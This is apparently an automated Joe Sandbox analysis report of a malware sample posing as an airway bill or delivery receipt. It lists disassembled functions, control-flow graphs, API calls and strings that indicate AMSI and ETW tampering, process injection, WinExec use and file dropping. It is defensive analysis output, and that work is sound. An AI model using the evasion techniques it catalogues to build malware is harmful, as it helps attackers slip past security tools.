2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b37ecc call 2b38798 * 6 CloseHandle call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c 5675->5988 5989 2b482ea-2b482fc call 2b3857c 5675->5989 5821->5822 5822->5554 5988->5464 5989->5988
                                                                                                    APIs
                                                                                                      • Part of subcall function 02B3881C: LoadLibraryA.KERNEL32(00000000,00000000,02B38903), ref: 02B38850
                                                                                                      • Part of subcall function 02B3881C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02B38903), ref: 02B38860
                                                                                                      • Part of subcall function 02B3881C: GetProcAddress.KERNEL32(74FA0000,00000000), ref: 02B38879
                                                                                                      • Part of subcall function 02B3881C: FreeLibrary.KERNEL32(74FA0000,00000000,02B81388,Function_000065D8,00000004,02B81398,02B81388,000186A3,00000040,02B8139C,74FA0000,00000000,00000000,00000000,00000000,02B38903), ref: 02B388E3
                                                                                                    • CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02C757DC,02C75820,OpenSession,02B8137C,02B4AFD0,UacScan,02B8137C), ref: 02B47E31
                                                                                                    • ResumeThread.KERNEL32(00000000,ScanBuffer,02B8137C,02B4AFD0,OpenSession,02B8137C,02B4AFD0,UacScan,02B8137C,02B4AFD0,ScanBuffer,02B8137C,02B4AFD0,OpenSession,02B8137C,02B4AFD0), ref: 02B4847B
                                                                                                    • CloseHandle.KERNEL32(00000000,ScanBuffer,02B8137C,02B4AFD0,OpenSession,02B8137C,02B4AFD0,UacScan,02B8137C,02B4AFD0,00000000,ScanBuffer,02B8137C,02B4AFD0,OpenSession,02B8137C), ref: 02B485FA
                                                                                                      • Part of subcall function 02B38798: LoadLibraryW.KERNEL32(bcrypt,?,00000A74,00000000,02B813A4,02B3A3BF,ScanString,02B813A4,02B3A774,ScanBuffer,02B813A4,02B3A774,Initialize,02B813A4,02B3A774,UacScan), ref: 02B387AC
                                                                                                      • Part of subcall function 02B38798: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02B387C6
                                                                                                      • Part of subcall function 02B38798: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000A74,00000000,02B813A4,02B3A3BF,ScanString,02B813A4,02B3A774,ScanBuffer,02B813A4,02B3A774,Initialize), ref: 02B38802
                                                                                                    • CloseHandle.KERNEL32(00000000,00000000,ScanBuffer,02B8137C,02B4AFD0,UacInitialize,02B8137C,02B4AFD0,ScanBuffer,02B8137C,02B4AFD0,OpenSession,02B8137C,02B4AFD0,UacScan,02B8137C), ref: 02B489EC
                                                                                                      • Part of subcall function 02B27E10: GetFileAttributesA.KERNEL32(00000000,?,02B3F8C4,ScanString,02B8137C,02B4AFD0,OpenSession,02B8137C,02B4AFD0,ScanString,02B8137C,02B4AFD0,UacScan,02B8137C,02B4AFD0,UacInitialize), ref: 02B27E1B
                                                                                                      • Part of subcall function 02B3DAC4: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02B3DB96), ref: 02B3DB03
                                                                                                      • Part of subcall function 02B3DAC4: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02B3DB3D
                                                                                                      • Part of subcall function 02B3DAC4: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02B3DB6A
                                                                                                      • Part of subcall function 02B3DAC4: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02B3DB73
                                                                                                      • Part of subcall function 02B38184: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02B3820E), ref: 02B381F0
                                                                                                    • ExitProcess.KERNEL32(00000000,OpenSession,02B8137C,02B4AFD0,ScanBuffer,02B8137C,02B4AFD0,Initialize,02B8137C,02B4AFD0,00000000,00000000,00000000,ScanString,02B8137C,02B4AFD0), ref: 02B4AA1D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Library$CloseFileHandle$AddressCreateFreeLoadPathProcProcess$AttributesCacheExitFlushInstructionModuleNameName_ResumeThreadUserWrite
                                                                                                    • String ID: Advapi$BCryptVerifySignature$C:\Windows\System32\$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPVerifyIndirectData$DllGetClassObject$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FlushInstructionCache$GetProcessMemoryInfo$I_QueryTagInformation$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WriteVirtualMemory$advapi32$bcrypt$dbgcore$endpointdlp$kernel32$mssip32$ntdll$psapi$psapi$spp$sppc$sppwmi$tquery
                                                                                                    • API String ID: 2481178504-1225450241
                                                                                                    • Opcode ID: 2b3c76ede034ed0ee09bdfa421ab2afbaa0b07440bc8918fee9bf0f59240d5aa
                                                                                                    • Instruction ID: e49ed1a94925b7c19387c904880e2041d7018f32ab8e7507339f81a9f34ad271
                                                                                                    • Opcode Fuzzy Hash: 2b3c76ede034ed0ee09bdfa421ab2afbaa0b07440bc8918fee9bf0f59240d5aa
                                                                                                    • Instruction Fuzzy Hash: 6543FA75A502688FDB12EB64DD809DE73B6AF84300F1045E6E50EEBA14DE30AE8DDF51
                                                                                                    Function 02B21724 Relevance: 12.3, APIs: 7, Strings: 1, Instructions: 289sleepCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 8535 2b21724-2b21736 8536 2b21968-2b2196d 8535->8536 8537 2b2173c-2b2174c 8535->8537 8538 2b21973-2b21984 8536->8538 8539 2b21a80-2b21a83 8536->8539 8540 2b217a4-2b217ad 8537->8540 8541 2b2174e-2b2175b 8537->8541 8542 2b21986-2b219a2 8538->8542 8543 2b21938-2b21945 8538->8543 8545 2b21684-2b216ad VirtualAlloc 8539->8545 8546 2b21a89-2b21a8b 8539->8546 8540->8541 8544 2b217af-2b217bb 8540->8544 8547 2b21774-2b21780 8541->8547 8548 2b2175d-2b2176a 8541->8548 8551 2b219b0-2b219bf 8542->8551 8552 2b219a4-2b219ac 8542->8552 8543->8542 8556 2b21947-2b2195b Sleep 8543->8556 8544->8541 8553 2b217bd-2b217c9 8544->8553 8554 2b216df-2b216e5 8545->8554 8555 2b216af-2b216dc call 2b21644 8545->8555 8549 2b21782-2b21790 8547->8549 8550 2b217f0-2b217f9 8547->8550 8557 2b21794-2b217a1 8548->8557 8558 2b2176c-2b21770 8548->8558 8565 2b217fb-2b21808 8550->8565 8566 2b2182c-2b21836 8550->8566 8561 2b219c1-2b219d5 8551->8561 8562 2b219d8-2b219e0 8551->8562 8560 2b21a0c-2b21a22 8552->8560 8553->8541 8563 2b217cb-2b217de Sleep 8553->8563 8555->8554 8556->8542 8559 2b2195d-2b21964 Sleep 8556->8559 8559->8543 8572 2b21a24-2b21a32 8560->8572 8573 2b21a3b-2b21a47 8560->8573 8561->8560 8568 2b219e2-2b219fa 8562->8568 8569 2b219fc-2b219fe call 2b215cc 8562->8569 8563->8541 8567 2b217e4-2b217eb Sleep 8563->8567 8565->8566 8571 2b2180a-2b2181e Sleep 8565->8571 8574 2b218a8-2b218b4 8566->8574 8575 2b21838-2b21863 8566->8575 8567->8540 8580 2b21a03-2b21a0b 8568->8580 8569->8580 8571->8566 8582 2b21820-2b21827 Sleep 8571->8582 8572->8573 8583 2b21a34 8572->8583 8576 2b21a68 8573->8576 8577 2b21a49-2b21a5c 8573->8577 8578 2b218b6-2b218c8 8574->8578 8579 2b218dc-2b218eb call 2b215cc 8574->8579 8584 2b21865-2b21873 8575->8584 8585 2b2187c-2b2188a 8575->8585 8587 2b21a6d-2b21a7f 8576->8587 8586 2b21a5e-2b21a63 call 2b21500 8577->8586 8577->8587 8590 2b218ca 8578->8590 8591 2b218cc-2b218da 8578->8591 8596 2b218fd-2b21936 8579->8596 8600 2b218ed-2b218f7 8579->8600 8582->8565 8583->8573 8584->8585 8593 2b21875 8584->8593 8588 2b218f8 8585->8588 8589 2b2188c-2b218a6 call 2b21500 8585->8589 8586->8587 8588->8596 8589->8596 8590->8591 8591->8596 8593->8585
                                                                                                    APIs
                                                                                                    • Sleep.KERNEL32(00000000,?,02B22000), ref: 02B217D0
                                                                                                    • Sleep.KERNEL32(0000000A,00000000,?,02B22000), ref: 02B217E6
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Sleep
                                                                                                    • String ID: 0`
                                                                                                    • API String ID: 3472027048-3339448193
                                                                                                    • Opcode ID: 9de52f03e330f1c44f43be050e076900e70a83814b8bf743001a668f2b839b8a
                                                                                                    • Instruction ID: 7c5f3a25644ed6ebf611e114c42ff20b3baec98efa00132b2af18c46f2bfe774
                                                                                                    • Opcode Fuzzy Hash: 9de52f03e330f1c44f43be050e076900e70a83814b8bf743001a668f2b839b8a
                                                                                                    • Instruction Fuzzy Hash: 02B12072A103608BDB15CF2CD880356BBE1EF85394F1886EAE65D8F386D730E559CB90
                                                                                                    Function 02B21A8C Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 175sleepCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 10477 2b21a8c-2b21a9b 10478 2b21aa1-2b21aa5 10477->10478 10479 2b21b6c-2b21b6f 10477->10479 10482 2b21aa7-2b21aae 10478->10482 10483 2b21b08-2b21b11 10478->10483 10480 2b21b75-2b21b7f 10479->10480 10481 2b21c5c-2b21c60 10479->10481 10484 2b21b81-2b21b8d 10480->10484 10485 2b21b3c-2b21b49 10480->10485 10488 2b21c66-2b21c6b 10481->10488 10489 2b216e8-2b2170b call 2b21644 VirtualFree 10481->10489 10486 2b21ab0-2b21abb 10482->10486 10487 2b21adc-2b21ade 10482->10487 10483->10482 10490 2b21b13-2b21b27 Sleep 10483->10490 10494 2b21bc4-2b21bd2 10484->10494 10495 2b21b8f-2b21b92 10484->10495 10485->10484 10492 2b21b4b-2b21b5f Sleep 10485->10492 10496 2b21ac4-2b21ad9 10486->10496 10497 2b21abd-2b21ac2 10486->10497 10498 2b21af3 10487->10498 10499 2b21ae0-2b21af1 10487->10499 10505 2b21716 10489->10505 10506 2b2170d-2b21714 10489->10506 10490->10482 10491 2b21b2d-2b21b38 Sleep 10490->10491 10491->10483 10492->10484 10500 2b21b61-2b21b68 Sleep 10492->10500 10502 2b21b96-2b21b9a 10494->10502 10504 2b21bd4-2b21bd9 call 2b214c0 10494->10504 10495->10502 10503 2b21af6-2b21b03 10498->10503 10499->10498 10499->10503 10500->10485 10507 2b21bdc-2b21be9 10502->10507 10508 2b21b9c-2b21ba2 10502->10508 10503->10480 10504->10502 10512 2b21719-2b21723 10505->10512 10506->10512 10507->10508 10511 2b21beb-2b21bf2 call 2b214c0 10507->10511 10513 2b21bf4-2b21bfe 10508->10513 10514 2b21ba4-2b21bc2 call 2b21500 10508->10514 10511->10508 10516 2b21c00-2b21c28 VirtualFree 10513->10516 10517 2b21c2c-2b21c59 call 2b21560 10513->10517
                                                                                                    APIs
                                                                                                    • Sleep.KERNEL32(00000000,?,?,00000000,02B21FE4), ref: 02B21B17
                                                                                                    • Sleep.KERNEL32(0000000A,00000000,?,?,00000000,02B21FE4), ref: 02B21B31
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Sleep
                                                                                                    • String ID: 0`
                                                                                                    • API String ID: 3472027048-3339448193
                                                                                                    • Opcode ID: a297bb532582eea2dead0f3834fa86ed68ce71cfb470d0296401e5b04c65e6b3
                                                                                                    • Instruction ID: 15f6aa8c18e736209029873f2ff6309f338767204e6b9020b7871a9205268b97
                                                                                                    • Opcode Fuzzy Hash: a297bb532582eea2dead0f3834fa86ed68ce71cfb470d0296401e5b04c65e6b3
                                                                                                    • Instruction Fuzzy Hash: D7519D716213608FE715CF6C8988756BBE4EF46314F1886EEE54C8B283E770D549CBA1
                                                                                                    Function 02B38704 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 35libraryCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • LoadLibraryW.KERNEL32(amsi), ref: 02B3870D
                                                                                                      • Part of subcall function 02B380C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B38148,?,?,00000000,00000000,?,02B38061,00000000,KernelBASE,00000000,00000000,02B38088), ref: 02B3810D
                                                                                                      • Part of subcall function 02B380C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B38113
                                                                                                      • Part of subcall function 02B380C0: GetProcAddress.KERNEL32(?,?), ref: 02B38125
                                                                                                      • Part of subcall function 02B37CF8: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B37D6C
                                                                                                    • FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02B3876C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressLibraryProc$FreeHandleLoadMemoryModuleVirtualWrite
                                                                                                    • String ID: DllGetClassObject$W$amsi
                                                                                                    • API String ID: 941070894-2671292670
                                                                                                    • Opcode ID: 5d64c744f737d4c36fb827dc9532959cc4cbb49c1899778a38b492eef03d278d
                                                                                                    • Instruction ID: 37abefbfcc5c8ee36c11fd9ee1d11580322bfdfa4d3143f1c517c61cdc131b6d
                                                                                                    • Opcode Fuzzy Hash: 5d64c744f737d4c36fb827dc9532959cc4cbb49c1899778a38b492eef03d278d
                                                                                                    • Instruction Fuzzy Hash: 46F068A054C381B9E202E6748C45F4BBFCE4B52224F448A9DF1E85A2D2DA75D10497B7
                                                                                                    Function 02B3E2EE Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 112networkCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02B3E42E
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CheckConnectionInternet
                                                                                                    • String ID: Initialize$OpenSession$ScanBuffer
                                                                                                    • API String ID: 3847983778-3852638603
                                                                                                    • Opcode ID: ef807b0571ce6bb4c34373b662ac0581569047f813d11b172c8a42f20411da7e
                                                                                                    • Instruction ID: d096c1d191ac557db11252cd9f16b43f3203b39444e2382723f994a6279957dc
                                                                                                    • Opcode Fuzzy Hash: ef807b0571ce6bb4c34373b662ac0581569047f813d11b172c8a42f20411da7e
                                                                                                    • Instruction Fuzzy Hash: D4412135B102189FEB02EBA4DC41ADEB3FAEF4C710F1148A6E555B7A50DA74ED098F50
                                                                                                    Function 02B3881C Relevance: 6.1, APIs: 4, Instructions: 65libraryloaderCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • LoadLibraryA.KERNEL32(00000000,00000000,02B38903), ref: 02B38850
                                                                                                    • GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02B38903), ref: 02B38860
                                                                                                    • GetProcAddress.KERNEL32(74FA0000,00000000), ref: 02B38879
                                                                                                      • Part of subcall function 02B37CF8: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B37D6C
                                                                                                    • FreeLibrary.KERNEL32(74FA0000,00000000,02B81388,Function_000065D8,00000004,02B81398,02B81388,000186A3,00000040,02B8139C,74FA0000,00000000,00000000,00000000,00000000,02B38903), ref: 02B388E3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Library$AddressFreeHandleLoadMemoryModuleProcVirtualWrite
                                                                                                    • String ID:
                                                                                                    • API String ID: 1543721669-0
                                                                                                    • Opcode ID: 50eff430e3eb5ad79b795481d1ff15eef59c9c414066a1f6dba77ab2eddfd947
                                                                                                    • Instruction ID: 6746e6d7a2ee8829c2ce62925da09a310af8d5375e1c9a0bc673fc3e8ef8fb9f
                                                                                                    • Opcode Fuzzy Hash: 50eff430e3eb5ad79b795481d1ff15eef59c9c414066a1f6dba77ab2eddfd947
                                                                                                    • Instruction Fuzzy Hash: 1D115EB1A51318BFEB01FBA8CC01A5E77AEEB45700F5048E4B60CF7A90DA749D16DB15
                                                                                                    Function 02B38406 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46processCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 02B38018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B38088,?,?,00000000,?,02B379FE,ntdll,00000000,00000000,02B37A43,?,?,00000000), ref: 02B38056
                                                                                                      • Part of subcall function 02B38018: GetModuleHandleA.KERNELBASE(?), ref: 02B3806A
                                                                                                      • Part of subcall function 02B380C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B38148,?,?,00000000,00000000,?,02B38061,00000000,KernelBASE,00000000,00000000,02B38088), ref: 02B3810D
                                                                                                      • Part of subcall function 02B380C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B38113
                                                                                                      • Part of subcall function 02B380C0: GetProcAddress.KERNEL32(?,?), ref: 02B38125
                                                                                                    • WinExec.KERNEL32(?,?), ref: 02B38470
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: HandleModule$AddressProc$Exec
                                                                                                    • String ID: Kernel32$WinExec
                                                                                                    • API String ID: 2292790416-3609268280
                                                                                                    • Opcode ID: 2678400622ca416fd6e548489f690ef4354d33f3ffc8af8695e591d23c9f204b
                                                                                                    • Instruction ID: 5248a44913d1f95b3415932f54802902e221bda5d31eb823c03394d0ff59fdc0
                                                                                                    • Opcode Fuzzy Hash: 2678400622ca416fd6e548489f690ef4354d33f3ffc8af8695e591d23c9f204b
                                                                                                    • Instruction Fuzzy Hash: CB01A439654304BFEB02EFA8DC41F5A77EDE748710F5184A0B508D7E50D634AD04DE22
                                                                                                    Function 02B38408 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45processCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 02B38018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B38088,?,?,00000000,?,02B379FE,ntdll,00000000,00000000,02B37A43,?,?,00000000), ref: 02B38056
                                                                                                      • Part of subcall function 02B38018: GetModuleHandleA.KERNELBASE(?), ref: 02B3806A
                                                                                                      • Part of subcall function 02B380C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B38148,?,?,00000000,00000000,?,02B38061,00000000,KernelBASE,00000000,00000000,02B38088), ref: 02B3810D
                                                                                                      • Part of subcall function 02B380C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B38113
                                                                                                      • Part of subcall function 02B380C0: GetProcAddress.KERNEL32(?,?), ref: 02B38125
                                                                                                    • WinExec.KERNEL32(?,?), ref: 02B38470
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: HandleModule$AddressProc$Exec
                                                                                                    • String ID: Kernel32$WinExec
                                                                                                    • API String ID: 2292790416-3609268280
                                                                                                    • Opcode ID: f2e4eab999c3dbba6705771c0c34a1298baa87a820816fc6fc720bac6e52c443
                                                                                                    • Instruction ID: aa15607668edd3928571eb1e52a6619f9466bc7e05532dbea38096e55801e32c
                                                                                                    • Opcode Fuzzy Hash: f2e4eab999c3dbba6705771c0c34a1298baa87a820816fc6fc720bac6e52c443
                                                                                                    • Instruction Fuzzy Hash: 75F0A439654304BFEB02EFA8DC41F5A77EDE748710F5184A0B508D7E50D634A904DE22
                                                                                                    Function 02B35BAC Relevance: 4.6, APIs: 3, Instructions: 105fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02B35CF4,?,?,02B33880,00000001), ref: 02B35C08
                                                                                                    • GetLastError.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02B35CF4,?,?,02B33880,00000001), ref: 02B35C36
                                                                                                      • Part of subcall function 02B27D10: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,02B33880,02B35C76,00000000,02B35CF4,?,?,02B33880), ref: 02B27D5E
